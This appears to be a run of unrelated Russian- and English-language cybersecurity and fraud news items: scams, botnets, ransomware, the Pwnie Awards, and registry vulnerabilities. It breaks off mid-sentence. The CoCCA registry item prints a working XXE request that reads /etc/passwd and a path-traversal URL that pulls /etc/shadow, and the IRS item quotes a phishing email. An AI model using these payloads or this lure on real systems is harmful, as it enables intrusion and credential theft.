Центральным (г. Минска) районным отделом Следственного комитета возбуждено уголовное дело по ч.4 ст.209 (мошенничество, совершенное в особо крупном размере) Уголовного кодекса Республики Беларусь. В настоящее время проводится комплекс следственных действий и оперативно-розыскных мероприятий, направленный на установление лиц, совершивших данное преступление.
Mozilla предлагает новое решение для контроля за приватностью в сети.
Mozilla запускает новую платную услугу мониторинга конфиденциальности под
названием Mozilla Monitor Plus. Подписка обойдётся пользователям в $8,99 в
месяц при годовой оплате.
В рамках сервиса Mozilla будет автоматически искать информацию о подписчиках на 190 сайтах, торгующих данными, собранными из соцсетей, приложений и трекеров. Если данные будут найдены, компания сформирует запрос на их удаление.
Тони Чинотто, менеджер продукта Mozilla Monitor, в интервью The Verge сообщил , что для сканирования и последующего удаления информации Mozilla сотрудничает с компанией Onerep. Обработка запросов на удаление обычно занимает от семи до четырнадцати дней, но иногда информацию удалить невозможно. В таких случаях Mozilla будет продолжать попытки удаления, а также предоставит подписчикам Mozilla Monitor Plus инструкции по самостоятельному удалению данных.
Новая платная подписка Mozilla Monitor Plus основывается на бесплатном мониторинге даркнета Mozilla Monitor (ранее Firefox Monitor) — службы, которую Mozilla впервые запустила в 2018 году. Как заявили в компании, пользователи бесплатной версии Basic Monitor могут по-прежнему рассчитывать на бесплатное сканирование брокеров данных по запросу, постоянное автоматическое ежемесячное сканирование и однократное формирование запросов на удаление.
По словам разработчиков, при сканировании брокера данных в интернете пользователь может обнаружить огромное количество персональной информации, начиная с имени, домашнего адреса и профессиональной деятельности и заканчивая данными о имеющихся судимостях, хобби или учебном заведении детей.
Сервисы по поиску и удалению персональных данных довольно распространены, но большинству пользователей о них мало известно. При поиске таких сервисов легко наткнуться на мошеннические сайты. Здесь может помочь репутация Mozilla как дочерней компании некоммерческой организации Mozilla Foundation с открытым исходным кодом, которая заботится о приватности.
Mozilla Monitor Plus уже доступен по цене 8,99 доллара в месяц, в то время как стандартная версия Mozilla Monitor остаётся бесплатной.
sc: theverge.com/2024/2/6/24062765/mozilla-monitor-plus-firefox-paid- subscription-privacy-data-broker-removal-requests
Турецкое Национальное управление разведки спасло палестинского хакера Омара А., который сумел взломать систему противоракетной обороны Израиля «Железный купол», сообщила газета Sabah, не называя источники информации.
По данным издания, хакера Омара А., который временно вывел из строя систему «Железный купол» в 2015–2016 годах и переехал в Турцию в 2020 году, задержали в Малайзии сотрудники национальной разведывательной службы Израиля «Моссад» во время его короткого выезда в эту страну на две недели. В ночь на 28 сентября 2022 года две группы израильских силовиков насильно посадили хакера в машину и вывезли его в район Селангор, в 50 км от столицы страны Куала-Лумпур. Там Омара А. на протяжении 36 часов допрашивали.
Как только Национальная разведывательная организация Турции (Milli İstihbarat Teşkilatı, MİT) выяснила, что хакера похитили, турецкие власти отправили информацию о задержании Омара А. малайзийским коллегам, заявив, что дело «очень срочное», а палестинского программиста «необходимо спасти», утверждает Sabah.
Несколько часов спустя спецназ Малайзии совершил рейд на место, где удерживали хакера, а мировой суд Куала-Лумпур выдал ордер на арест 11 человек, которые допрашивали разработчика.
Через несколько дней после этой операции группы антитеррористического управления департамента полиции Стамбула под руководством MİT задержали агента «Моссада» в Стамбуле, который обращался к хакеру с предложением партнерства. Мужчину отправили в тюрьму за шпионаж в пользу Израиля.
В итоге программиста Омара А. доставили в Турцию, где он живет в доме под охраной турецкой разведки MİT и продолжает свою работу по разработке программного обеспечения.
Израильские власти материал газеты Sabah пока не комментировали.
• Source: [https://www.sabah.com.tr/galeri/gun...akti-gazzeli-dahi-genci- kurtarma-operasyonu/4](https://www.sabah.com.tr/galeri/gundem/son-dakika- demir-kubbeyi-cokertti-mossadi-pesine-takti-gazzeli-dahi-genci-kurtarma- operasyonu/4)
NTV не уточняет, почему об этой шпионской истории сообщается сейчас. Представители местных СМИ не исключают, что это может быть связано с отношением к ХАМАС турецкого президента Реджепа Тайипа Эрдогана. Он называет это движение легитимной политической силой в секторе Газа, а Израиль - "террористическим государством".
• Source: [https://www.ntv.com.tr/turkiye/demi...i-hackeri-mit- kurtardi,RHBSlfkE6E2jojJygCOykg](https://www.ntv.com.tr/turkiye/demir- kubbeyidevre-disi-birakanfilistinli-hackeri-mit- kurtardi,RHBSlfkE6E2jojJygCOykg)
Этичные хакеры продемонстрируют, как они получили контроль над спутником и перехватили передаваемые данные.
Исследователи кибербезопасности покажут процесс захвата контроля над спутником Европейского космического агентства (ESA) в демонстрации, которая была описана как первое в мире упражнение по этичному взлому спутников. Группа экспертов из компании Thales и члены команды ЕКА продемонстрируют сценарий атаки на конференции CYSAT в Париже .
Атака нацелена на OPS-SAT , наноспутник размером с обувную коробку, который был запущен в декабре 2019 года и содержит «экспериментальный компьютер, в 10 раз мощнее любого современного космического корабля ЕКА».
Спутник OPS-SAT
Целью OPS-SAT является устранение рисков, связанных с тестированием систем управления полетами в реальном времени. Thales заявил, что ЕКА сохраняло доступ к системам спутника на протяжении всего учения, чтобы после этого он мог вернуться к нормальной работе.
Учения направлены на то, чтобы повысить осведомленность о потенциальных уязвимостях, а также усилить кибербезопасность спутников и космических программ в целом, включая как наземные сегменты, так и орбитальные системы.
Хотя полный характер демонстрации Thales еще не ясен, компания заявляет, что ее команда смогла захватить ряд систем, используемых для управления демонстрационным спутником, в ходе традиционной кибератаки.
Компания заявила, что пентестеры воспользовались «стандартными правами доступа к спутнику, чтобы получить контроль над средой его приложений», а затем воспользовались уязвимостями и внедрили вредоносный код в системы спутника.
Атака позволила перехватить данные, отправленные обратно на Землю, в частности, путем изменения изображений, снятых камерой спутника, и достичь других целей, таких как маскировка выбранных географических областей на спутниковых снимках при одновременном сокрытии их деятельности, чтобы избежать обнаружения Агентством.
Демонстрация состоялась в связи с тем, что космическая кибербезопасность в целом привлекла больше внимания экспертов. Более того, недавно исследовательская группа Cyberspace Solarium Commission призвала США официально назвать космос критически важным сектором инфраструктуры и предпринять шаги для защиты спутников и других космических систем от кибератак.
source:
cysat.eu
hesa.int/Enabling_Support/Operations/OPS-SAT
Определены победители ежегодной премии Pwnie Awards 2021, выделяющей наиболее значительные уязвимости и абсурдные провалы в области компьютерной безопасности. Pwnie Awards считается аналогом Оскара и Золотой малины в области компьютерной безопасности.
Основные победители ( список претендентов ):
• Лучшая уязвимость, приводящая к повышению привилегий. Победа присуждена компании Qualys за выявление [уязвимости](https://blog.qualys.com/vulnerabilities- research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron- samedit) CVE-2021-3156 в утилите sudo, позволяющей получить привилегии root. Уязвимость присутствовала в коде около 10 лет и примечательна тем, что для её выявления потребовался тщательный разбор логики работы утилиты.
• Лучшая серверная ошибка. Присуждается за выявление и эксплуатацию наиболее технически сложной и интересной ошибки в сетевом сервисе. Победа присуждена за [выявление](https://www.blackhat.com/us-21/briefings/schedule/#proxylogon-is- just-the-tip-of-the-iceberg-a-new-attack-surface-on-microsoft-exchange- server-23442) нового вектора атак на Microsoft Exchange. Информация не обо всех уязвимостях данного класса опубликована, но уже раскрыты сведения об уязвимости CVE-2021-26855 (ProxyLogon), позволяющей извлечь данные произвольного пользователя без аутентификации, и CVE-2021-27065, дающей возможность выполнить свой код на сервере с правами администратора.
• Лучшая криптографическая атака. Присуждается за выявление наиболее значимых брешей в реальных системах, протоколах и алгоритмах шифрования. Премия присуждена компании Microsoft за уязвимость (CVE-2020-0601) в реализации цифровых подписей на основе эллиптических кривых, позволяющую сгенерировать закрытые ключи на основе открытых ключей. Проблема позволяла создать поддельные TLS-сертификаты для HTTPS и фиктивные цифровые подписи, которые верифицировались в Windows как заслуживающие доверия.
• Наиболее инновационное исследование. Премия присуждена исследователям, предложившим метод BlindSide для обхода защиты на основе рандомизации адресов (ASLR) при помощи утечек по сторонним каналам, возникающим в результате спекулятивного выполнения инструкций процессором.
• Самый большой провал (Most Epic FAIL). Премия присуждена компании Microsoft за многократно выпущенное неработающее исправление [уязвимости](https://blog.0patch.com/2021/07/free-micropatches-for- printnightmare.html) PrintNightmare (CVE-2021-34527) в системе вывода на печать Windows, позволяющей выполнить свой код. Вначале компания Microsoft пометила проблему как локальную, но затем выяснилось, что атака может быть совершена удалённо. Затем Microsoft четыре раза публиковала обновления, но каждый раз исправление закрывало лишь частный случай и исследователи находили новый способ совершения атаки.
• Лучшая ошибка в клиентском ПО. Победил исследователь, выявивший [уязвимость](https://www.blackhat.com/us-21/briefings/schedule/#chip-chop--- smashing-the-mobile-phone-secure-chip-for-fun-and-digital-forensics-23566) CVE-2020-28341 в безопасных криптопроцессорах Samsung, получивших сертификат защищённости CC EAL 5+. Уязвимость позволяла полностью обойти защиту и получить доступ к выполняемому на чипе коду и хранимым в анклаве данным, обойти блокировку хранителя экрана, а также внести изменения в прошивку для создания скрытого бэкдора.
• Hаиболее недооценённая уязвимость. Премия присуждена компании Qualys за выявление серии уязвимостей 21Nails в почтовом сервере Exim, 10 из которых могут быть эксплуатированы удалённо. Разработчики Exim скептически восприняли возможность эксплуатации проблем и потратили более 6 месяцев на разработку исправлений.
• Самая ламерская реакция производителя (Lamest Vendor Response). Номинация за самую неадекватную реакцию на сообщение об уязвимости в собственном продукте. Победителем признана компания Cellebrite, занимающейся созданием приложений для криминалистичкского анализа и извлечения данных правоохранительными органами. Cellebrite неадекватно отреагировала на сообщение об уязвимостях, отправленное Мокси Марлинспайком (Moxie Marlinspike), автором протокола Signal. Мокси заинтересовался Cellebrite после публикации в СМИ заметки о создании технологии, позволяющей взламывать зашифрованные сообщения Signal, впоследствии оказавшейся [фейком](https://signal.org/blog/cellebrite-and- clickbait/) из-за неверной интерпретации информации в статье на сайте Cellebrite, которая затем была убрана ("атака" требовала физического доступа к телефону и возможности снятия блокировки экрана, т.е. сводилась просмотру сообщений в мессенджере, но не вручную, а с использованием специального приложения, симулирующего действия пользователя).
Мокси изучил приложения Cellebrite и нашёл там критические уязвимости, которые позволяли организовать выполнение произвольного кода при попытке сканирования специально оформленных данных. В приложении Cellebrite также был выявлен факт использования устаревшей библиотеки ffmpeg, не обновлявшейся 9 лет и содержащей большое число неисправленных уязвимостей. Вместо того, чтобы признать проблемы и заняться исправлением проблем компания Cellebrite опубликовала заявление, что заботится о целостности данных пользователей, поддерживает безопасность своих продуктов на должном уровне, регулярно выпускает обновления и поставляет лучшие приложения в своём роде.
• Самое большое достижение. Премия присуждена Ильфаку Гильфанову, автору дизассемблера IDA и декомпилятора Hex-Rays, за вклад в разработку инструментов для исследователей безопасности и способность поддерживать актуальный продукт на протяжении 30 лет.
The Internal Revenue Service (IRS) has warned US tax professionals of identity thieves actively targeting them in a series of phishing attacks attempting to steal Electronic Filing Identification Numbers (EFINs).
Scammers started this ongoing phishing campaign right before the US tax season
with the end goal of stealing both client data and tax preparers' identities.
The phishing emails ask tax preparers to email copies of their "EFIN (e-file
identification number) verification and Driver's license" as part of a bogus
verification process.
To convince potential victims to hand over their info, the attackers threaten
that the account they use to file tax documents electronically will be
disabled.
Once they get their hands on this information, the fraudsters will be able to illegally file tax returns for refunds by impersonating the targeted professionals.
The attackers' emails use IRS Tax E-Filing as the sender name, a "Verifying your EFIN before e-filing" subject line, and have the following content:
In order to help protect both you and your clients from unauthorized/fraudulent activities, the IRS requires that you verify all authorized e-file originators prior to transmitting returns through our system. That means we need your EFIN (e-file identification number) verification and Driver's license before you e-file.
Please have a current PDF copy or image of your EFIN acceptance letter (5880C Letter dated within the last 12 months) or a copy of your IRS EFIN Application Summary, found at your e-Services account at IRS.gov, and Front and Back of Driver's License emailed in order to complete the verification process. Email: (fake email address)
If your EFIN is not verified by our system, your ability to e-file will be disabled until you provide documentation showing your credentials are in good standing to e-file with the IRS.
© 2021 EFILE. All rights reserved. Trademarks
2800 E. Commerce Center Place, Tucson, AZ 85706
"Tax professionals also should be aware of other common phishing scams that
seek EFINs, Preparer Tax Identification Numbers (PTINs) or e-Services
usernames and passwords," the [IRS added](https://www.irs.gov/newsroom/irs-
summit-partners-issue-urgent-efin-scam-alert-to-tax-professionals).
"Some thieves also pose as potential clients, an especially effective scam currently because there are so many remote transactions during the pandemic.
"The thief may interact repeatedly with a tax professional and then send an
email with an attachment that claims to be their tax information."
Links or attachments bundled with these phishing messages may also be used by
the attackers to infect the targets' computers with malware that could steal
their information.
Tax pros targeted by this ongoing phishing campaign are advised not to respond
to such emails and to send the emails (as file attachments) to
phishing@irs.gov.
The IRS impersonation scam should also be reported to the Treasury Inspector
General for Tax Administration for further
investigation by the IRS Criminal Investigation division.
In November 2020, aggressive scammers impersonated the IRS in e-mails threatening targets with legal charges and arrest warrants unless they paid fabricated outstanding amounts related to missed or late payments.
Следователем Главного следственного управления ГУ МВД России по Кемеровской области – Кузбассу завершено расследование уголовного дела в отношении троих местных жителей. Они обвиняются в хищении денежных средств у женщин из разных регионов России.
«По версии следствия, в 2019 году один из злоумышленников разработал криминальную схему, в которую вовлек своего отца и брата. Они регистрировали фиктивные аккаунты в социальных сетях от имени иностранцев, а затем рассылали электронные письма женщинам, желавшим найти спутника жизни. После непродолжительного романтического общения аферисты сообщали, что из-за рубежа направили посылку с подарками. Однако, чтобы ее получить, необходимо оплатить таможенный сбор и услуги курьера. С потерпевшими связывался соучастник противоправной деятельности и сообщал банковские реквизиты, на которые следует перевести деньги», – рассказала официальный представитель МВД России Ирина Волк.
Обещанные подарки россиянки не получали, при этом мошенники продолжали их уговаривать оплатить дополнительные расходы. Как только женщины понимали, что их обманули, сообщники переставали выходить с ними на связь и блокировали на сайте.
Фигуранты были задержаны сотрудниками ГУ МВД России по Кемеровской области – Кузбассу в декабре 2022 года.
«Благодаря работе следователей и полицейских установлено 98 криминальных эпизодов, ущерб составил около 5,5 млн рублей.
Следователем ГСУ ГУ МВД России по Кемеровской области – Кузбассу возбуждено уголовное дело по признакам преступлений, предусмотренных частью 4 статьи 159 УК РФ.
В настоящее время уголовное дело направлено на рассмотрение в Центральный районный суд г. Кемерово», – сообщила Ирина Волк.
В киберарсенале RUBYCARP свыше 600 заражённых серверов и обширный набор вредоносных инструментов.
Группа киберпреступников из Румынии, известная под кодовым названием «RUBYCARP», использует известные уязвимости и методы брутфорса для взлома корпоративных сетей и серверов с целью получения финансовой выгоды. Об этом говорится в свежем отчёте компании Sysdig. В настоящее время RUBYCARP управляет ботнетом, который насчитывает более 600 заражённых серверов, работающих через частные IRC-каналы.
Исследователи обнаружили 39 вариаций полезной нагрузки ботнета RUBYCARP на базе Perl, однако лишь 8 из них обнаруживались на VirusTotal на момент выхода отчёта. Специалисты также отметили, что данная группа киберпреступников активна уже на протяжении более десяти лет.
Кроме того, в отчёте упоминается, что между RUBYCARP и APT-группой Outlaw существуют некоторые связи, хотя эти связи и являются слабыми, основываясь в первую очередь на общих тактиках, используемых их ботнетами.
Последняя вредоносная кампания RUBYCARP включала в себя целенаправленные атаки против приложений Laravel через уязвимость удалённого выполнения кода CVE-2021-3129, а также брутфорс SSH-серверов и атаки на сайты WordPress с использованием баз данных учётных записей.
После установки вредоносного ПО на заражённом сервере, оно затем подключается к C2-серверу на базе IRC и становится частью ботнета. Исследователи выявили три отдельных кластера ботнета — «Juice», «Cartier» и «Aridan», каждый из которых, вероятно, используется для разных целей.
Заражённые устройства могут использоваться для запуска распределённых атак типа «отказ в обслуживании» (DDoS), фишинга, финансового мошенничества и для майнинга криптовалют. RUBYCARP применяет майнеры NanoMiner, XMrig и собственную разработку C2Bash для добычи криптовалюты, такой как Monero, Ethereum и Ravencoin, используя вычислительные мощности жертв.
Группа также использует фишинг для кражи финансовой информации, развёртывая готовые фишинговые шаблоны на заражённых серверах. Так, в последней кампании хакеры использовали шаблоны, направленные на европейские компании, включая Swiss Bank, Nets Bank и Bring Logistics.
Несмотря на то, что RUBYCARP не является одним из крупнейших операторов ботнетов, способность группы действовать практически незаметно более десяти лет свидетельствует о высоком уровне скрытности и операционной безопасности.
Кроме управления ботнетом, Sysdig сообщает, что группа также занимается разработкой и продажей хакерских инструментов, что указывает на обширный арсенал вредоносных программ, имеющихся в их распоряжении.
sc: sysdig.com/blog/rubycarp-romanian-botnet-group/
Киберпреступная группировка DarkPath Scammers организовала в Сети новую мошенническую кампанию, в ходе которой злоумышленники создают вредоносные веб- сайты, замаскированные под официальный ресурс Всемирной организации здравоохранения (ВОЗ). Об атаках DarkPath Scammers рассказали эксперты компании Group-IB.
Прикрываясь ВОЗ, мошенники подняли распределённую сеть из 134 сайтов. Чтобы как-то привлечь доверчивых пользователей, преступники обещают вознаграждение за прохождение опроса, который якобы приурочен ко Дню осведомленности о здоровье.
Потенциальным жертвам обещают 200 евро, но вместо выплаты денег пользователей перенаправляют на сайты знакомств и другие мошеннические ресурсы, а также пытаются навязать платные подписки.
Первыми на подозрительные сайты вышли представители Международного вычислительного центра ООН (UNICC), которые сразу же оповестили о возможной мошеннической кампании специалистов Group-IB.
Способ распространения злоумышленники выбрали не слишком оригинальный: пользователя просят поделиться ссылкой на опрос с друзьями, знакомыми и коллегами через мессенджер WhatsApp. После того как жертва нажимала кнопку «Поделиться», её сразу отправляли на сторонние мошеннические ресурсы.
В результате невнимательный пользователь мог попасть на фишинговые страницы или содержащие вредоносные программы сайты. А отличительной особенностью всей кампании стал индивидуальный подход к жертвам, для которого использовался User-Agent и настройки языка. Таким способом злоумышленники подстраивали, например, валюту вознаграждения под локацию пользователя.
Обнаружив 134 связанных вредоносных домена, Group-IB стали копать дальше и вышли на более крупную сеть из 500 других мошеннических и фишинговых ресурсов. Для них киберпреступники задействовали ещё 50 известных международных брендов.
Большая часть сайтов DarkPath Scammers до сих пор активна и продолжает атаковать пользователей.
Исследователи безопасности из группы Hackcompute опубликовали результат своих экспериментов по изучению защищённости регистраторов доменных имён, атака на которых может привести, например, к изменению DNS-серверов для перенаправления запросов на хост злоумышленника. В результате исследования в одной из реализаций XML-протокола EPP (Extensible Provisioning Protocol), применяемого для организации обмена данными между регистратором и оператором реестра доменных имён, выявлена критическая уязвимость, позволяющая прочитать содержимое любых файлов на сервере.
Используя уязвимость исследователям удалось получить содержимое закрытого SSH- ключа администратора сервера, отвечающего за доменную зону "ai" и учётные данные для хранения резервных копий всего содержимого. Персонал регистратора, отвечающего за домен первого уровня "ai" подтвердил, что уязвимость позволяет скомпрометировать сервер и получить полный контроль над любыми доменами в DNS- зоне ".ai", в том числе можно изменить DNS-серверы для любого домена. Кроме инфраструктуры зоны ".ai" проявление уязвимости удалось выявить на серверах, отвечающих за ведение реестра доменных имён в зонах .bj, .bw, .ci, .gl, .ke, .kn, .lb, .ly, .mr, .ms, .mz, .ng, .pyc, .rw, .so, .ss, .td и .zm.
Отдельный интерес представляет то, как была найдена уязвимость. Так как протокол EPP использует XML и принимает соединения на 700 сетевом порту, исследователи через сканирование портов в глобальной сети построили список хостов, на которых открыт 700 порт и попытались отправить запросы, используя известные типовые приёмы атак на уязвимые XML-библиотеки. На серверах c ПО CoCCA Registry Software сработал приём с подстановкой внешних ресурсов через манипуляции с элементом XXE (XML external entity). Например, для чтения файла /etc/passwd с сервера достаточно было отправить запрос:
Code:Copy to clipboard
<?xml version="1.0" standalone="no"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<epp xmlns="urn:ietf:params:xml:ns:epp-1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:ietf:params:xml:ns:epp-1.0 epp-1.0.xsd">
<command>
<poll op='req' />
<clTRID>&xxe;</clTRID>
</command>
</epp>
Далее исследователи изучили Web API, предоставляемый на серверах с CoCCA Registry Software и доступный на стадии до прохождения аутентификации. В Java- классе CitiesServlet была найдена ещё одна уязвимость, позволяющая передать содержимого любого локального файла. Проблема возникла из-за отсутствия проверки наличия символов "/.." при формировании имени файла на основе одного из параметров URI. Сочетание данной уязвимости с XXE-уязвимостью в парсере XML позволило получить доступ к любым файлам в системе, так как ПО CoCCA Registry Software выполняется с правами root.
В ходе атаки XXE-уявзимость использовалась для определения структуры файлов и каталогов на сервере, а уязвимость в Web API для простой загрузки нужных файлов с сервера (например, для загрузки /etc/shadow достаточно выполнить запрос "https://epp.whois.ai/cities?country=/../../../../../../../../etc/shadow"). Исследователи сообщили о проблемах разработчикам ПО CoCCA Registry Software и в настоящее время уязвимости уже устранены.
«Мы находимся в состоянии войны, и это не преувеличение»
По заявлению президента Коста-Рики Родриго Чавеса, количество пострадавших
государственных учреждений от продолжающейся кибератаки группировки Conti в
стране увеличилось до 27. Чавес добавил, что 9 учреждений считаются «сильно
пострадавшими».
В середине апреля правительство уходящего президента Карлоса Альварадо сообщило о кибератаке на министерство финансов страны. Однако, атака распространилась на другие госучреждения после отказа властей выплатить выкуп в размере $10 млн.
По словам Чавеса, атака вынудила министерство финансов заблокировать системы сбора налогов Коста-Рики, но резервная платформа позволила провести некоторые таможенные операции. Более того, кибератака отключила правительственные системы почти на месяц. Президент также обвинил своих соотечественников в «предательстве страны» и предыдущую администрацию в сокрытии информации об атаке.
«Мы находимся в состоянии войны, и это не преувеличение. Война идет против международной террористической группы, которая имеет сотрудников в Коста-Рике. Есть очень четкие признаки того, что люди внутри страны сотрудничают с Conti» , - заявил Чавес.
Родриго Чавес объявил войну против Conti после заявления группировки о намерении « свергнуть правительство с помощью кибератаки ». В сообщении на своем сайте Conti призвала граждан Коста-Рики оказать давление на правительство, чтобы власти заплатили выкуп, который был удвоен с первоначальных $10 млн. до $20 млн. За период атаки США предложила награду в размере до $10 млн. за информацию, которая могла бы идентифицировать или найти основных координаторов Conti.
По словам министра науки и технологий Карлоса Генри Альварадо, правительства Израиля, США и Испании оказали помощь в защите компьютерных систем Коста-Рики и устранении повреждений от кибератаки. Альварадо также добавил, что полный размер ущерба пока неизвестен.
Напомним, что в связи с кибератакой Родриго Чавес 8 мая, в первый день своего пребывания на посту президента, объявил чрезвычайное положение в стране .
Киберполицейские совместно со следователями Главного следственного управления Национальной полиции Украины под процессуальным руководством Офиса Генерального прокурора разоблачили преступную группу, члены которой похищали средства с банковских счетов ведущих промышленных предприятий Украины.
Оперативники киберполиции установили, что злоумышленники инфицировали компьютеры работников компаний вредоносным программным обеспечением. Таким образом фигуранты получали скрытый удаленный доступ к финансовым операциям и подменяли реквизиты получателей средств на подконтрольные.
Следователи Нацполиции установили, что таким образом злоумышленники нанесли украинским предприятиям более 6 миллионов гривен убытков. Однако, фигуранты не смогли прийти к согласию относительно распределения «заработанных» средств. Поэтому организатор и соорганизатор начали требовать у сообщника перечислить его долю на подконтрольные счета. Не получив желаемого, злоумышленники похитили своего «партнера».
Благодаря розыскным мероприятиям полицейские установили транспортное средство, в котором находились фигуранты и задержали двух фигурантов в порядке ст. 208 Уголовного процессуального кодекса Украины, ликвидировав деятельность группировки.
Следователи Нацполиции объявили подозрение по ч. 2 ст. 146 (Незаконное лишение свободы или похищение человека) и ч. 4 ст. 189 (Вымогательство) Уголовного кодекса Украины и избрали меры пресечения в виде содержания под стражей. Сейчас досудебное расследование по этим фактам завершено. Обвиняемым грозит до 12 лет лишения свободы с конфискацией имущества.
Продолжаются следственные действия в рамках уголовного производства, открытого по ч. 4, 5 ст. 185 (Кража) Уголовного кодекса Украины, относительно похищения обвиняемыми и их сообщниками денежных средств предприятий. Возможна дополнительная квалификация.
Сотрудники ОБК ГУ МВД России по Воронежской области во взаимодействии с коллегами из региональных Управлений ФСБ России задержали участников организованной группы. В ее состав входили молодые люди в возрасте от 17 до 21 года, проживающие на территории Воронежской и Белгородской областей. Они подозреваются в содействии телефонным мошенникам, которые вели противоправную деятельность за пределами Российской Федерации.
«Предварительно установлено, что криминальная схема функционировала с начала текущего года. Злоумышленники, действуя по указанию анонимных кураторов, обеспечивали работу специального оборудования, которое позволяло подменять номера зарубежных абонентов на российские. Аферисты представлялись сотрудниками финансовых учреждений и правоохранительных органов, попавшими в ДТП родственниками, после чего убеждали граждан передать им свои сбережения. Для противоправной деятельности использовались сим-боксы и GSM-шлюзы.
По местам жительства подозреваемых и в офисных помещениях на территории Воронежской и Белгородской областей проведены обыски. Обнаружено и изъято серверное оборудование, средства связи, ноутбуки и другие предметы, имеющие доказательственное значение», – сообщила официальный представитель МВД России Ирина Волк.
Ущерб, причиненный россиянам, превысил 10 млн рублей.
Следователем СЧ ГСУ ГУ МВД России по Воронежской области возбуждены уголовные дела по признакам преступления, предусмотренного частью 3 статьи 159 УК РФ. В отношении двух фигурантов избрана мера пресечения в виде заключения под стражу, один находится под домашним арестом. Семерым избрана мера процессуального принуждения в виде обязательства о явке.
«В настоящее время продолжаются мероприятия, направленные на установление всех эпизодов и соучастников противоправной деятельности», – добавила Ирина Волк.
Португальская газета Expresso и телеканал SIC подверглись атаке хакеров- вымогателей
Ресурсы крупнейшей португальской медиакомпании IMPRESA были выведены из строя в результате атаки группы хакеров-вымогателей Lapsus$.
Как [сообщает](https://www.reuters.com/business/media-telecom/portugals- impresa-media-outlets-hit-by-hackers-2022-01-03/) Reuters, в результате атаки на инфраструктуру медиагруппы были выведены из строя ресурсы телеканала SIC, включая сервис потокового вещания, еженедельной газеты Expresso и основной веб-сайт компании.
Хакеры, называющие себя Lapsus$ Group, утверждают, что украли 50 Тб корпоративных данных Impresa. Киберпреступники угрожают обнародовать данные, если медиагруппа не заплатит выкуп.
Lapsus$ получили доступ к учетной записи Amazon Web Services Impresa, разослали фишинговые письма подписчикам Expresso и оставили в Twitter сообщение с проверенной учетной записи газеты.
Веб-сайты Expresso и SIC не работают с воскресенья, на страницах изданий отображается сообщение, что они «временно недоступны» после атаки и постараются восстановить работу «как можно скорее».
Издания называют инцидент «беспрецедентной атакой на свободу прессы в цифровую эпоху».
Подробнее: https://www.securitylab.ru/news/528231.php
Следствие по делу о вымогательстве у «Ланит» 40 млн руб. завершено. Одним из обвиняемых и, по версии следствия, организатором преступления является экс- полковник ФСБ, который трудился в подразделении по защите конституционного строя и борьбой с терроризмом.
Расследование завершено
Завершено расследование уголовного дела о вымогательстве 42,5 млн руб. у компании «Ланит» за прекращение распространения негативной информации. Об этом Главное следственное управление ГУ МВД России по Москве уведомило фигурантов и их защитников, написал «Коммерсант».
Ожидается, что к середине октября 2024 г. обвиняемая сторона ознакомятся с материалами уголовного дела, состоящего из более 100 томов. Троим обвиняемым инкриминировали вымогательство в особо крупном размере (п. «б» ч. 3 ст. 163 УК РФ). За это им грозит от 7 до 15 лет заключения.
Фигурантами дела являются экс-полковник ФСБ Михаил Поляков, переводчик Денис Савинский и предприниматель Александр Санин. Все трое уже больше года находятся в СИЗО. Полякова содержат в «Лефортово», а Савинского и Санина — в специзоляторе №99/1. Свою вину они не признают.
«Ланит», «ЛАборатория Новых Информационных Технологий» — один из крупнейших ИТ-холдингов России, многопрофильная группа компаний, созданная в 1989 г. По данным, указанным на ее сайте на момент выхода материала, в ней работает 14,5 тыс. человек.
Версия следствия
Следствие считает Полякова организатором вымогательства. На момент начала инкриминируемых событий, то есть «не позднее ноября 2020 г.», он служил в так называемой второй службе столичного управления ФСБ, которая занимается защитой конституционного строя и борьбой с терроризмом. К моменту задержания он вышел в отставку и занимал должность заместителя директора по безопасности АНО «Дирекция всемирного фестиваля молодежи».
Как считает обвинение, его план заключался в размещении на подконтрольных Telegram-каналах негативных постов, которые могли «причинить существенный вред правам и законным интересам» собственников ИT-компании «Ланит». Целью было желание завладеть имуществом руководителей «Ланита», выдвинув требование о передаче денег за удаление этих сообщений и установку «блока на негатив».
Следствие пришло к выводу, что с ноября 2020 г. по июль 2023 г. Поляков по прозвищу «дядя Миша ФСБ», как его называли администраторы Telegram-каналов, и его соучастники получили в общей сложности 42,504 млн руб. При этом изначально обвиняемые потребовали $66 тыс., а затем получали ежеквартальные переводы в криптовалюте.
Обналичиванием полученных денег, как считает следствие, занимались женатый на родной сестре Полякова переводчик Денис Савинский, а также гендиректор ООО «Производственно-строительная компания "Наследие"» Александр Санин.
Версия обвиняемых
Фигуранты несколько раз заявляли, что в материалах уголовного дела содержатся сведения всего об одной-единственной негативной публикации в Telegram-канале «Незыгарь» в ноябре 2021 г., которая провисела там девять минут и была удалена после обращения ГК «Ланит». В ней речь шла о взаимоотношениях компании с налоговыми органами. По словам обвиняемых, это был репост статьи из газеты «Версия» от 15 ноября 2021 г. под заголовком «Ты удираешь, а я догоняю», она до сих пор находится в открытом доступе.
Поляков утверждал, что не знаком с предполагаемым сообщником Саниным. Он также категорически отрицал всякое общение с представителями «Ланита» по поводу установки «блока на негатив», а также контакты с нанятым компанией индивидуальным предпринимателем, который оказывал фирме услуги, связанные с информационным сопровождением и имиджем. Он вел переписку с админом канала «Незыгарь» под ником nzgrcontact и никогда не встречался с полковником Поляковым лично.
Защита обвиняемых полагает, что уголовное дело расследовалось ГСУ столичной полиции незаконно, поскольку на момент вменяемых событий Поляков был действующим офицером ФСБ и его дело должны были вести военные следователи СКР.
Представители «Ланит» не смогли предоставить CNews комментарии по этому уголовному делу.
Под запрет попадает, в частности, ПО израильской компании NSO Group под названием Pegasus, которое позволяет осуществлять слежку за людьми через их смартфоны
Министерство торговли США в среду объявило о введении ограничений на экспорт
или перепродажу программных средств Китаю и России, которые могут быть
использованы для хакерских атак. Об этом сообщает в среду газета The
Washington Post.
Издание отмечает, что соответствующее правило вступит в силу через 90 дней.
Некоторое ПО нельзя будет продавать Китаю, России и ряду других стран без
лицензии Бюро промышленности и безопасности США.
В случае с Россией и другими странами, которые находятся с ней в списке,
лицензию Бюро промышленности и безопасности надо будет получать как для
продажи ПО не сотрудничающим с властями лицам, так и представителям
госструктур.
Получать подобную лицензию также обяжут зарубежные организации, которые
занимаются продажей ПО или технологий американского происхождения для
разработки продуктов киберзащиты. Прежде чем выдать лицензию, Бюро
промышленности и безопасности будет проверять покупателя.
Как сообщается, под запрет попадает, в частности, ПО израильской компании NSO
Group под названием Pegasus, которое позволяет осуществлять слежку за людьми
